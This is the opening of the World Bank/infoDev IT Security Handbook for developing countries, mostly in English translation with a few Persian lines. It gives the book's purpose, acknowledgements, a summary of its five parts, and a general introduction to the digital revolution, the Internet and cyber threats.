‫ﺍﮔﺮ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺑﺮ ﻋﻬـﺪﺓ ﺷـﻤﺎ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻛﺘﺎﺏ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻭ ﻧﺤﻮﺓ ﻛﺎﺭﻛﺮﺩﻥ‬
‫ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳـﺎ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﻫـﻢ ﺭﺍ‬
‫ﺑﻴﺎﻣﻮﺯﻳﺪ‪ .‬ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﻇﻴﻔﺔ ﻫﺮ ﻓﺮﺩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻓﺮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ‪ ،‬ﻛﺎﺭﺷﻨﺎﺱ ﻓﻨﻲ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴـﺴﺘﻢ‪،‬‬
‫ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ‪ ،‬ﻭ ﻣﺪﻳﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷـﺒﻜﻪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﺪ‪.‬‬
Attention to the importance of security leads to necessary and reassuring measures being taken to protect systems, and using an effective set of security policies is an important step toward ensuring this. In that case, in most instances your computers and information will be safe from unauthorized access, and you will be able to exchange your information securely with others over the network.
This book was prepared at a time when the use of information and communications technology in socio-economic development had reached a peak, having already been used for 40 years or more in regional or operational projects run by bilateral or multilateral aid agencies. The belief that information and communications technology is an important and vital subject for launching many development activities is relatively new, and dates back to the rise of the global Internet in the early 1990s. It was first formally declared within a multilateral institution by the infoDev program of the World Bank Group in 1995, with the intellectual support of the then president of the World Bank, James Wolfensohn, who placed great emphasis on the importance of information sharing for achieving socio-economic development goals. Since then, optimism about socio-economic development has grown, due in part to the spread of inexpensive technologies around the world.
In 2001 the member countries of the G8 established the Digital Opportunity Taskforce Group (DOT). The DOT committee presented the results of its work in a report and called for 9 topics to be included in the Genoa Plan of Action, all of which were endorsed and signed by the G8 leaders at the Genoa summit in 2001. The main members of the DOT committee are the principal stakeholders of the G8 and the governments of developing countries, the private and non-profit sectors, and a host of international organizations. The report includes 7 action points as vital topics for building the information society:
1) Support for policies
2) Promoting and improving access
3) Human resource development
4) Fostering entrepreneurs and entrepreneurial activities
5) Participation of developing countries in international conferences on information technology
6) Application of technology in health
7) Application software and local content
One outcome of this report was the creation of the U.N. Secretary General's ICT Task Force; another was the formation of the Global Digital Opportunities Initiative, funded by the United Nations Development Program (UNDP), the Accenture Foundation and the Markle Foundation. Bilateral agencies are also now paying increasing attention to information and communications technology in their development projects. Subsequently, ITU and UNESCO put forward plans to hold two world summits, named the World Summit on Information Society (WSIS), in Geneva (December 2003) and Tunis (April 2005).
Information and communications technology can indirectly support many activities toward achieving the Millennium Development Goals (MDG). Core IT security policies and their implementation in a country strengthen the flow of foreign direct investment into that country, and this investment in turn provides funding for securing much of the economic infrastructure.
The question then arises why this book, written primarily for readers in developing countries, is needed. The answer is that security principles are always the same, regardless of whether you are in a developed, developing or undeveloped country, because technologies and the threats related to them can appear from any corner of the world. There are, of course, many ways to secure computers and networks, which are undoubtedly not always available or cheap in developing countries.
It is important to note first that computer users and administrators in developed countries have very extensive access to practical and technical information that can help them in various areas of their work. For example, there are many bookstores and libraries that use computers, so asking peers for help is easy. When a computer or network runs into trouble, there is a rich set of information channels through which security news and information are sent. Organizations that use computers and networks have help centers, run by technical specialists, that are able to prevent the misuse of organizational resources and to protect them.
Users and technical administrators in developing countries usually lack the ability to provide this level of support. The number of users is small, and the warnings and solutions that are offered go unheeded. Organizations that use computers often have a small staff and so cannot oversee their own internal technical resources. Often this inattention and inability stem from a lack of sufficient information and knowledge about computer systems and network security, and even groups that have grasped the basic principles usually struggle to understand how to adapt technical solutions to the changing and unpredictable conditions of this environment.
In the past, unlimited after-sales service was provided for computers, which were few and expensive; today, given the sheer volume of computers on the market, such service cannot easily be offered. Computer shops and repair centers are usually unaware of problems arising in other parts of the world, and as a result users and administrators become victims of developments in information related to technology security.
Network security breaches occur in every country and may even put governments under pressure. Many of these breaches usually go unreported, because public knowledge of them can have undesirable consequences. Governments and organizations in developed countries are generally able to cope with such breaches, but the consequences of security breaches and failures in developing countries can be far more severe than in developed ones. On top of all this, markets, organizations and governments in developing countries show little inclination to fix security flaws, because they pay no attention to the consequences of large-scale computer intrusions, are unable to analyze the financial losses caused by such attacks, and lack a reasonable estimate of the time needed to repair the damage (if the damage can be repaired at all).
Developing countries must treat security as their top priority, because the risk of criminal activity falls mostly on places that lack adequate controls and are insecure. E-commerce operations in countries where IT security is less well provided are more attractive targets for attack. What small or medium-sized organization could survive the theft of confidential customer information or business files, or the tampering of its key information? Developing countries must improve their capacity in trained human resources and their technology infrastructure so that they are not easy targets for cyber criminals. This book contains much discussion of the nature of security, because there are differing views on the need for security. People concerned about data see it as a matter of information security; those who deal with the technical mechanisms for storing and transmitting information see it in terms of system and network security; while others engaged in commerce view it as a new area of business, generally under the heading of e-security.
Given these issues, we have chosen to present everything that falls under the heading of "IT security", and in this way to address all the mechanisms for storing, processing and transmitting information, hardware, software, and the facilitation of communications, with particular attention to the security of the information itself. It is important that both information and the mechanisms that process it be protected from misuse.
We have deliberately limited our attention in this book to computers, software and networks, because rich and numerous sources exist for the details of other matters, such as fixed and mobile telephony, that are closely related to these issues but are not covered here. As telephone and computer technologies converge, such matters also gain importance. With the emergence of Voice over IP and ENUM, digital telephony protocols are seeing growing use, and with the emergence of 3G technologies, issues such as their security will gradually need attention as well.
This book has been produced so that it is available at low cost in developing countries as well. The aim of publishing it is not to achieve a large print run; rather, the intention is for its contents to be offered on a worldwide website that is dynamic in two respects: first, that its material be as up to date as possible, and second, that it provide useful and relevant information to readers seeking information about IT security.
Readers should note that the authors use various terms for the subject of security and computers. In general, IT security refers to the following:
1) Computer security: the technical security of machines, software, data and networks. This term is used mostly in Parts Two and Five, which focus more on the physical, infrastructural and technical dimensions of technology security.
2) Cyber-security: IT security as it relates to government policy. This term is generally used by government bodies and national policymakers in documents, laws and research projects, and is more or less synonymous with "Internet security" (a term not used in this book but sometimes seen in other references). Both expressions refer to aspects of network security and to network policy matters such as the definition of privacy, cybercrime, commerce and global communications. The difference between the two terms is not great; rather, as can be seen in many chapters of this book, the security of computers, networks and data is closely intertwined with everyday notions of security in cyberspace.
The material in this book is divided into five parts, each suited to a particular group of readers. Note that overlapping and repeated material can sometimes be found across the parts of the book, so that many readers can choose to read only the part that is useful to them. Some parts, especially those describing security and computer users, can be published independently and distributed to the users who need them.
In today's fast-moving world, a handbook runs the risk of becoming obsolete soon after publication. To keep the contents of this book current, all of its parts are available on a website at www.infodev-security.net, so that each can be updated in future. Readers who wish to contribute useful material to updates of the website can send their suggestions to the e-mail address [email protected].
In preparing this book we have had to strike a balance among general principles, specific examples and practical information, and we hope the balance struck is the right one. Although technical details will change as technology advances and evolves, these principles will remain constant, and readers will be able to understand them easily from the policy and management standpoint as well as the technical one. If these principles are understood well, technical solutions will readily follow.
This book would never have been possible without the support of a number of key individuals and institutions. They include Simson Garfinkel, who gave important guidance in shaping the initial structure of the book and then helped to identify and coordinate part of the team that prepared it; publication of this handbook would not have been possible without his guidance and help. They also include Bruno Lanvin, manager of infoDev, who devoted substantial funding to conveying the relevance and power of creating and distributing information in the field of information and communications technology, as well as Jacquelin Dubow, Ellie Alavi, Teri Nachazel and Heriri Bretadeau, all of whom are managers at infoDev. We also thank Tim O'Reilly, who, with the support of his company, O'Reilly & Associates, published the following two books: Practical Unix and Internet Security, 3rd Edition (Simson Garfinkel, Gene Spafford and Alan Schwartz, 2003) and Web Security, Privacy & Commerce (Simson Garfinkel and Gene Spafford, 2002). These books were used to complete important parts of this handbook, and several sections of them are reprinted here with the permission of the authors and publishers. In addition, over the past ten years O'Reilly & Associates has made tens of thousands of its technical titles available to people in developing countries. Readers who have seen the state of books and of access to published material in the developing world know how effective and important O'Reilly's contribution has been in building these countries' knowledge for learning about, spreading and making use of the Internet, and so in narrowing the digital divide.
We owe warm thanks to the authors of the books mentioned above for their generous and enthusiastic help in allowing material from their books to be used in parts of this handbook. Their enthusiasm for helping to publish this handbook is the finest example of professional cooperation and information sharing in today's new Internet civilization.
We would also like to thank Tom Kellermann, Senior Data Risk Management Specialist in the Integrator Group and Treasury Security Team of the Operations Policy Department of the World Bank. His writings on e-finance, blended threats and mobile risk management have been used in Part Three of this book.
Max Schnellmann, Switzerland's representative on the information development committee at the 2002 meeting in Chongqing, China, was also one of the first to recognize the importance and usefulness of an IT security handbook for developing countries. It was his support and recommendations that led to the Swiss government's backing of infoDev for the publication of this book, and we acknowledge that support here.
Michel Maechley also assembled a group of active specialists to work on the material in this book, and it was these people who offered valuable suggestions for improving the accuracy and relevance of the final version. We thank them for their constructive guidance, and we also express our thanks and gratitude to everyone involved and to all who helped with the publication of this book.
This book is neither a tutorial reference for the Unix, Windows or Macintosh operating systems nor a reference for learning system administration; rather, it should be used alongside the administration guides for those systems.
Managing extensive changes to computer systems can make them difficult to support, even when those changes are needed to raise the level of security. For readers' convenience we point to many Internet resources, but readers who use suggested programs and patches found on the Internet should exercise caution, because after changes are made to a system's kernel, architecture or commands it may not be easy to assess their overall security impact. If solutions and programs from different vendors are implemented or installed routinely, the overall level of security may weaken over the long term; attention should therefore also be paid to the compatibility of system components and to the quality and reputation of the companies that provide technical and consulting services.
We hope this book makes these matters easier for you to understand, and we are confident that readers will also help improve the quality of its contents in the future.
Executive Summary
The IT Security Handbook is a practical guide to understanding and carrying out the steps needed to achieve security in information technology applications at home and in your workplace. Although the book presents the best and most current practices in information technology, it is written primarily for readers in developing countries. Besides summarizing the physical and electronic threats in the field of IT security, it addresses the management practices, regulatory environments and patterns of cooperation among partner organizations that currently exist in markets, governments, professional institutions and international organizations. The book consists of five parts, each of which can be read independently of the others.
This executive summary covers the main topics of the book and, in a section titled "Highlights of the Book", gives an overview of each part.
The adoption of information and communications technology is growing
The book begins with a review of the growth of the information and communications technology (ICT) sector. This growth extends to ordinary ICT users and is evident in the rising number of home networks and the growth of small and medium-sized enterprises (SMEs), which rely on computing resources to serve markets that depend heavily on the development of technology and its deployment worldwide.
Available information on the track record of IT security activities
Because the growth of the market for technology products and services is striking at both the individual and the organizational level, awareness of IT security issues is very useful and important. Individual users may be unaware of the risks they face when using the Internet. Even if users recognize the dangers of unprotected networks, they may still put off learning about firewalls, virus scanners, encryption and the systematic upkeep of information because of the cost and time involved and the change it requires in their computing habits. Moreover, small and medium-sized enterprises may adopt a single technical solution such as a firewall while paying no attention to the layering of security levels, unaware that without it the security of the system is seriously at risk. They may also, for various reasons, delay securing their systems and neglect to draw up clear security policies for users and managers. If an organization lacks proper communication, awareness and training, criminals may easily get past its technical safeguards.
Technology in a changing environment: mobile devices, common application software, and threats that add complexity
Today, new and non-expert users are not the only cause of IT security breaches. The ICT environment is changing rapidly with the emergence of new products, especially mobile devices (such as laptop computers, mobile phones and PDAs, or Personal Digital Assistants), which pose different challenges for infrastructure and data security. The emergence of computer applications for electronic investment and e-commerce has also introduced complexities into networked environments.
From the advent of automated teller machines to the spread of online banking, these capabilities deliver worthwhile cost savings, but they also bring potential threats and risks.
What makes matters worse is that intruders are now able to develop and extend their threats, for example with combinations of viruses, worms and Trojans that can inflict more severe damage on these systems and data. Such damage can be even more dangerous than that caused by some malicious software (malware). Because all of these developments affect technology users worldwide, the best ways of countering the resulting threats can be achieved only through international cooperation.
International cooperation and security in developing countries
IT security is of great importance in developing countries. The Internet has clearly created golden opportunities for commerce and communication that were hard even to imagine some ten years ago. Internet access, of course, is not always cheap. The Internet lets users explore a vast range of subjects, and through e-mail it has made communication between people far more efficient than traditional postal services. The Internet has also affected the fundamentals of international trade: markets in developing countries can now sell their goods online. Although the number of competitors in the market is still very large, customers can easily view the capabilities and products of rival companies without needing extensive knowledge of the field. Because access to markets beyond geographic borders is highly attractive to any economy, broad cooperation is needed to establish a model of an efficient, global networked system.
Highlights of the Book:
IT Security and Developing Countries
Highlights of Part One
IT Security in the Digital Age
Part One of the book is an introduction to general security issues in the electronic age. People have always been concerned about security, but the invention of computers and networks has changed the picture. This part maps out the scope of IT security, describes the many kinds of improper acts against computers and networks, and introduces the risks of using them without appropriate security measures.
Part One covers the following:
• The digital revolution
• Defining security
• The emergence and growth of the Internet
• An overview of security issues
• Attackers of IT security
Awareness of general IT security topics, such as the existence and spread of particular security threats, will help users, managers and policymakers adopt effective measures to strengthen the safety of their home or workplace networks against security breaches.
Highlights of Part Two
IT Security and Individual Users
Part Two addresses users who use network and computing resources for a variety of purposes at home or at work, and it will also be useful to small organizations that are not in a position to define IT security policies precisely and administer them at the organizational level. This part explains the basic principles of security for users and offers guidance on techniques that reduce security threats. Topics covered in Part Two include:
• The need for computer and network security; the impact of security breaches;
• Physical security, and support for authentication through usernames and passwords;
• Security risk assessment and security analysis in a typical company;
• Types of malicious software and how they spread;
• How e-mail and the Internet work, and why they are vehicles for computer attacks;
• Suggested policies and procedures for drawing up security programs and plans;
• Software tools, including virus scanners, firewalls and remote access tools;
• The role of management in securing computers, networks and data;
• Personnel security, including training and awareness, the hiring process, and the use of outside security resources;
• More advanced concepts, such as the structure of TCP/IP networks and encryption, for interested users.
Part Two fully covers security issues and risk-reduction methods from a technical standpoint. This part looks at security from the home user's perspective, and Part Three from the organizational perspective.
Highlights of Part Three
IT Security and Organizations
Part Three examines the policy and administration dimensions of security from the organizational point of view. Adopting appropriate security policies and implementing them properly reduces the risk of sudden information loss, makes unauthorized entry into systems much harder, and provides the security tools for detecting attacks and fixing security holes. Keeping confidential data private and helping to preserve the integrity of programs and stored data, and of that data in transit over the network, requires a combination of policy-making and implementation. This part covers the components of effective security policy for different kinds of organizations, such as commercial companies, governments, universities and non-profit organizations.
Part Three examines the following topics in detail:
• An eight-pillar approach to security that is especially valuable in financial and credit service environments;
• Computer crime, incident reporting and disaster recovery;
• Security threats that wireless technologies pose to companies; and
• Supplementary guidance and factors that help in designing and implementing sound organizational security.
Part Three also gives an overview of policies directly related to commercial, non-profit and government operations in the networked world, and draws on expert discussions and the World Bank's international dialogues on IT security. Part Four goes deeper into laws and general policies in the cyber world and examines these issues in a global context.
Highlights of Part Four
IT Security and Government Policy
Part Four examines the security topics that need to be understood at the level of government. Besides securing its own information resources, a government must commit to setting out a body of policy for protecting its national information infrastructure. Such policy plays an important role in IT security, yet there is a paradox: a national policy framework should be able to raise the level of security, but poor government regulation will do more harm than good. Technology is changing rapidly, and new computer threats arise from those very changes. In this situation, government laws are used to catch criminals and to prevent the spread of new forms of wrongdoing. Striking the right balance between legislative and non-legislative measures is therefore very important. Clearly, a government's cyber-security policies must be drawn up with regard to the social and technical characteristics of the Internet. Here governments can take many steps to improve computer security without interfering in technical matters.
Part Four covers the following topics:
• Communications networks and other critical infrastructures that are privately owned but overseen by government (a picture of the interdependence of government and the private sector);
• The overall role of government and its responsibilities in improving computer security in the public, private and non-profit sectors;
• Computer crime laws drawn up to protect private and government computers and networks;
• Traditional concepts that have in some way been carried over into computer law;
• Government laws, regulations and policies that emphasize improving computer security in the areas of consumer protection, personal communications data, and e-commerce frameworks; and
• Examples of the policies and laws of a number of countries, and references at recognized international organizations.
Part Four assesses security from the legal and high-level policy perspective. Part Five takes a deeper look at the technical requirements and procedures needed for IT security.
Highlights of Part Five
IT Security and Technical Administrators
Part Five helps network and system administrators do their jobs more effectively. It covers matters that need to be understood at both the technical and the managerial level, such as how security controls are breached and what the methods of countering threats are. The other parts of the book survey matters such as home-user security, security from the organizational perspective, and the implementation of high-level security policy. Part Five examines specific security threats in detail, including the various methods of attacking systems and programs, methods of monitoring traffic on important networks, best practices for securing these systems, and the proper way to work with security tools in a crisis.
Part Five covers the following:
• The design of security systems and the methods used by system intruders;
• Various IT security threats, from environmental factors to sabotage and information theft, and measures to counter them;
• Mechanisms for protecting data against unintended disclosure, known as data confidentiality (preventing unauthorized users from accessing the system and changing data and programs) and data integrity (ensuring that software and information remain intact and correct);
• Procedures for the identification, authentication and authorization of users;
• Common security problems on computers used to provide information services, and server configurations that minimize them;
• Network security from the hardware side (modems, routers and wireless access) and the software side (the network protocols used on local networks and the Internet, such as TCP/IP);
• Technologies used to attack workstations and servers, known as denial of service (DoS) and programmed threats;
• How to use auditing and logging tools to help identify vulnerable systems and find what has been changed on them;
• Specific technical recommendations for the Unix, Linux, Windows and Macintosh operating systems.
Because of the size and complexity of the subject, several annexes are included at the end of the book. Annex 1 contains a glossary of common terms used in the field of information and communications technology, and Annexes 2 to 5 present the references used in preparing the book. These resources include printed documents, electronic documents and a list of organizations active in security matters. All readers are encouraged to consult the references listed in the resources section.
Next Steps and Conclusion
Digital technology has given us new tools whose major impact is evident in education, health, commerce and other sectors of society. This technology benefits all countries and peoples, but it can hold particular appeal for developing countries, helping them increase their integration into the global economy; at the same time, doing so is costly for countries. Foreign direct investment in developing countries, and trust and confidence in them, depend on the secure and efficient implementation of technology and infrastructure. Governments, organizations and home users all play an important part in securing networks and their electronic and information assets. This book contains a collection of common best practices in security that help readers implement policies and procedures suited to their circumstances. The book also includes plentiful references on topics covering other aspects of IT security, so learning its contents is a step toward knowledge transfer and capacity building at the local level in today's expanding world. The book is published by the World Bank, and a CD-ROM and a website containing new material on the subject have also been made available to interested readers. The first edition of the book was presented at the World Summit on Information Society (WSIS) in Geneva in December 2003.
The World Bank wishes to retain copyright in this book under the Universal Copyright Convention, and copying its material for research, education or other purposes is not permitted except in developing countries that are members of the World Bank. The findings, interpretations and conclusions in this book are entirely those of the authors and should not be attributed to the World Bank, its affiliated organizations, the members of its Board of Directors, or its member countries.
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﻣﻘﺪﻣﻪ‬
The emergence of digital technology is counted among the most prominent technological advances of the past half-century, and it has become a vital factor in human life today.[1] For many of us this kind of technology has taken the form of digital computers and has become a necessary tool for doing work and meeting personal needs. In 1951, when the first commercial digital computer, known as UNIVAC I, was delivered to the U.S. Bureau of the Census,[2] most people knew nothing about computers, and those computers were in use at only a handful of universities and research laboratories. These computers were large, expensive and full of faults. By contrast, today's computers are relatively small, inexpensive and reliable, and they can be found in every country.
Shortly after computers became common in universities, research projects were started to connect them to one another so that information could be exchanged among them. Of these projects, the ARPANET network development project was the most successful, and it became what we know today as the "Internet", which currently connects more than 300 million computers around the world.
The World Wide Web,[3] which was created by Tim Berners-Lee[4] and Robert Cailliau[5] at the Center for European Nuclear Research[6] in the early 1990s in the city of Geneva, is a powerful service that uses the Internet to create a global information system and has greatly increased the productivity and appeal of the Internet. Although many people make no distinction between the World Wide Web and the Internet, the Web is in fact only one of the services[7] (and of course the most important of them) that have turned the Internet into such a powerful tool for disseminating information and communicating.
Over the past ten years the Internet has become an important means of communication among all segments of society, and we depend on it for instant access to information, private communications, all kinds of applications, commerce, business relationships and financial transactions. Reliability of and easy access to the Internet are a vital factor in the sustained and continuing success of developed countries, and their importance for developing countries is also growing rapidly. The effects of using computers and the results of the Internet revolution have gone beyond their direct benefits, and further impacts are predicted to be on the way.
First of all, the Internet has blurred the geographical boundaries between the users connected to it and has facilitated globalization by offering the capabilities of communication media, so that anyone, regardless of physical location, is able to connect to it. Search engines[8] have multiplied the effect of this change, because search results appear according to subject and not according to the user's distance from them, so that the websites of factories and companies located in developed and in developing countries have an equal chance of being seen by visitors.
[1] Digital Tornado: The Internet and Telecommunications Policy, FCC Staff Working Paper on Internet Policy (1997): http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html
[2] U.S. Bureau of Census
[3] World-Wide Web
[4] Tim Berners-Lee
[5] Robert Cailliau
[6] Center for European Nuclear Research (CERN)
[7] Services
[8] Search Engine
The second issue is that the Internet has had a remarkable effect on the process of eliminating commercial intermediaries. One example is the marked fall in the employment of secretaries in developed countries, the reason being that writing a text and printing and sending a personal message to people with facilities such as word processors and electronic mail is easier than dictating the text to a secretary. In the same way, group tourism is now also heading for extinction, because tourists can book their air or train tickets and the hotel rooms they want online,[9] which saves the customer money and time and makes it possible, with a little care over the bookings, to enjoy a pleasant trip. The emergence of companies that sell books, music and electronic products online has threatened and damaged the shops that offer such products, but at the same time, in many parts of this trade, it has also widened the target market. Because traditional professions and industries continue to exist, they tend to employ fewer people and may even move toward specialized markets instead of offering general services. The visible effects of the elimination of intermediaries, which began with the appearance of this technology, will continue for a long time, and with the growing importance of information technology more industries and professions will be replaced by it.
The third consequence is that productivity, at least in the industries that depend on information technology, will rise at a remarkable pace. With electronic mail, information can be sent and exchanged across the world in only a few seconds, so that global discussions and negotiations can be pursued and brought to a conclusion much faster than in the past. Business that until recently was conducted by post, telex and telephone is now carried out faster and more efficiently by applying new concepts in the mobile telecommunications industry, and this has shortened the time cycle of activities.
The last point is that keeping information storage and telecommunication lines secure is also essential in this new environment. Industry and technology today are working intensely to find a way to guarantee the security of their infrastructure, because those involved have realized that most of the Internet's security flaws result from the insecure hardware and software present in it. In this environment, building confidence and trust in computers, networks and stored data is of more or less the same importance as in an environment in which business relationships are conducted through face-to-face conversation.
[9] Online
This is equally clear in the case of developing countries: organizations that have not achieved an adequate level of security in their digital infrastructure and do not properly protect the transmission of their information will not be worthy of trust and will fall behind the caravan of the new global economy.[10]
The Digital Revolution
Today digital technology has gone beyond the realm of computers. Technological advances in the microelectronics industry have made it possible to build complex electronic devices at very small scales, so that you can now carry very complex communication and computing equipment in your pocket. In addition, the improvement in the price-to-performance ratio of this kind of technology is about 30% each year, and it is very likely that this rate will hold for the next ten years as well.[11] We expect this technology to be widely embraced, to create new arenas in commerce and to be a starting point for the golden age of digital technology.
Today's modern telephone equipment is entirely digital, and purpose-built computer systems have replaced switching equipment based on mechanical relays. Since the arrival of the compact disc in the late 1980s, sound and music have taken digital form, and with the arrival of the MP3 music format in the late 1990s sound recording has become entirely digital even in the home. In the world of photography and filming, too, digital images and digital cameras have taken the place of image capture on photographic film.
[10] Braga, Carlos Prima, Inclusión or Exclusion, UNESCO Courier: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html
[11] This rate of technical progress is one of the consequences of Moore's law, which was described by Gordon Moore, the father of Intel, in the 1960s. He says that in every 2-year period (which he later reduced to 18 months) technology allows manufacturers to produce microprocessors with twice the capacity at the same price. This trend has held for the past 40 years and is expected to continue for at least another 10 years.
Today even motion pictures and cartoons have become digital, because in this form their production costs are lower and their quality is higher. Little by little video tapes have given way to DVD technology, and motion pictures are made and edited with digital facilities.
Wireless telephone standards are moving toward digital technology, and with protocols such as GSM, CDMA, TDMA and their variants they will gradually replace the older generation of analog technology standards. In developed countries digital television has come onto the scene, and before long it will take the place of the broadcast standards (although this change will be somewhat slower than the others, because the number of existing home receivers that depend on the older standards is very large).
Physical security systems are also turning into their electronic counterparts. In hotels, apartments and offices, physical keys have given way to electronic cards. The television cameras used in the surveillance systems of buildings and facilities also often use electronic equipment that, instead of sending television signals to a video monitor, sends electronic images to digital monitoring stations.[12]
Many of the services we use today could not be provided without computers, networks and digital technology. Airlines, too, cannot compete with one another without computerized reservation systems and flight maintenance and support systems. Aircraft depend to a large extent on electronic sensors and digital controls and cannot work properly without them. Even cars use microprocessors for proper operation and to help with their troubleshooting and maintenance. Global positioning systems (GPS)[13] let you know where on Earth you are at any moment, and with such a relatively cheap device alongside a computer that holds a database of maps you will be able to find your route, points of interest, restaurants, road signs, the services offered along the way and, finally, your intended destination.
These digital devices are being placed on the network at an incredible speed. Wireless telephones are able to connect to the Internet; at first they could send voice, now they can exchange images over the Internet, and soon they will also have GPS capability, so that people who are in danger or have had an accident can be located with great precision using nothing but a telephone. Many of the services we now use (such as the automated teller machines used to exchange and transfer money) work on the principle of "network availability". Interbank and international financial and credit transactions depend heavily on credit and financial networks.[14] Today electronic banking transactions over the Internet are available to individuals.
The development of digital electronic devices and of devices connected to one another has many benefits, but negative points can also be seen in it. It has become easier for people to find out where you are. Seeing the web advertising pages, finding what you are looking to buy in shops, and observing what you are watching or reading online is also simpler than before. If such monitoring is applied to your interests you will as a rule not become aware of it, but you may want to be sure that such data is collected with your permission and is used only for purposes that you know of and agree with. Many people attach great importance to their privacy, and governments are also inclined to protect the rights of individuals, although the extent and strictness of law enforcement differ from one country to another. The main issue for governments is to recognize the benefits of emerging technologies while still preserving the values and freedoms that can be enjoyed without those technologies. The point is that governments must understand the new technologies and assess the effect of new capabilities and facilities on freedoms. Governments must also take effective steps to ensure that, if public laws and policies in this area do not strengthen existing freedoms, there is at least a collective consensus about them.
[12] This particular case may steer jobs toward developing countries. As soon as images are in digital form and placed on the Internet, they can be sent to a monitoring system anywhere on the network. According to forecasts, this security capability, which needs no special skill, can be set up in developing countries at lower cost and with equal quality. This proposal was welcomed by developers, but because national borders are crossed in this kind of outsourcing, some physical security concerns may arise.
[13] Global Positioning System
[14] In the past, the financial exchange network between banks used a very secure private network designed for this specific purpose, and it was not connected to the Internet. Considering the great value of that network and the very destructive and serious effects of any intrusion into it, this seems entirely logical.
The digital world is usually known as cyberspace,[15] and its definition covers all the computers and digital devices that are connected to one another by internal and external networks and can communicate with each other.[16] In cyberspace, just as in physical space, one can speak of meetings and of getting things done, but a distinction must be made between behavior in cyberspace and in the real world in which we live, work and play.
The rapid spread and popularity of personal computers and the Internet in the various sectors of developing countries has brought many benefits. Nevertheless, the Internet is not in itself a medium that is immune to criminal behavior. The cost of not paying enough attention to security can be the loss of the data that a large organization or government institution needs to do its work. The Internet is not inherently secure, but the cost of securing it is not very significant compared with the cost of losing the valuable data of organizations and institutions. Another point that can be very important is that the effect of theft and financial fraud in a company is not confined to that company alone but affects the country's industry as a whole.
[15] Cyberspace
[16] "Cyberspace" was first used by a writer named William Gibson, for a parallel world built by the computers of the whole world, in 1984 in his novel titled "Neuromancer". This definition may be useful in literature, but its meaning has gradually changed from what Gibson had in mind. For more information, see this same footnote in the original book or the following source: Intven, et al., Legal and Regulatory Aspects of e-Commerce and the Internet, World Bank Legal Review, vol. 1 2003, at fn 17. (Kluwer)
With the expansion of the Internet and the marked increase in concern about cyber attacks,[17] the number of such incidents is also rising: "Although computers are a suitable point for carrying out terrorist attacks, it must also be borne in mind that some acts of sabotage are carried out by people who seek to earn money in this way. The Computer Emergency Response Team (CERT)[18] identified 52,658 Internet security incidents in 2001, which is twice the number of the year before and four times that of two years before it."[19]
The subject of computer and network security is of particular importance for developing countries. The Internet can remove distances and provide access to countless materials. With the World Wide Web, the Internet will be able to make use of the available information about the companies, facilities and products of developing countries and to develop trade in them. In addition, search engines make no geographical distinction between websites, and so the suppliers of services, essential goods and raw materials in developing countries stand on the Web alongside the suppliers of goods and services in developed countries.[20] This is sometimes called "the death of distance";[21] a term that shows the course of the flow of information on the Internet.
[17] Cyber Attacks
[18] Computer Emergency Response Team
[19] Reuters/USA Today, April 16, 2003
[20] In fact, search engines differentiate among the answers found on the basis of language, and so in the global market everyone must speak the language of their target market. Search engines also may not be patient enough to wait for a response from sites whose connection is slow. In any case, commercial companies can host their site anywhere in the world and choose their hosting location so that the information is close to the target markets. Some companies use mirror sites; that is, they host a copy of the site in a different geographical location so that the customer's access time to the information is kept to a minimum.
[21] Cairncross, F., The Death of Distance: How the Communications Revolution will Change our Lives, Harvard Business School Press (1997).
Nevertheless there are always serious risks, such as the loss of records, denial-of-service attacks, corruption of information and other kinds of hostile attack. The loss of all or part of its electronic records can cripple a company. For a country whose information technology security is weak, there is a possibility that its vital resources will be put at risk and suffer irreparable damage. For countries that attach importance to foreign relations in their industries, insufficient attention to security can cause serious and unforeseen losses. Achieving the Millennium Development Goals (MDG)[22] depends on the ability of developing countries to use information technology effectively and to increase their budget through permanent membership of the World Trade Organization.[23] The ability to obtain and supply appropriate information can help developing countries in all economic fields.
Unfortunately, all the good and bad sides of human nature can also be seen in cyberspace. Because it is easy to copy digital content and to edit it, deception and the distortion of information, such as the forging of administrative and official documents, become easy. Because the Internet began in a research and cooperative environment and its goal was the easy sharing of information, its structure facilitates attacks on computers and the theft of confidential information.
The motivation of people who behave in this way in cyberspace is similar to the motivations that drive them to similar acts in the real world, but with one major difference: the environment created by computers and the Internet has given rise in people to the desire to prove that they can get into systems and cause problems. Most of the problems in cyberspace are caused by crackers.[24] Crackers are people who want to prove that they can get past any security barrier placed in their way. If we want to model such behavior in the real world, we must point to a person who wants to prove that they can enter your home and then leave without touching anything! Such a phenomenon not only causes a feeling of insecurity, but also raises the question of what is being changed or is going missing, or what measures can be taken to prevent further intrusions. Just as such behavior is not tolerable in the real world, it cannot be tolerated in cyberspace either. The techniques in this book will help you to protect yourself against such behavior.
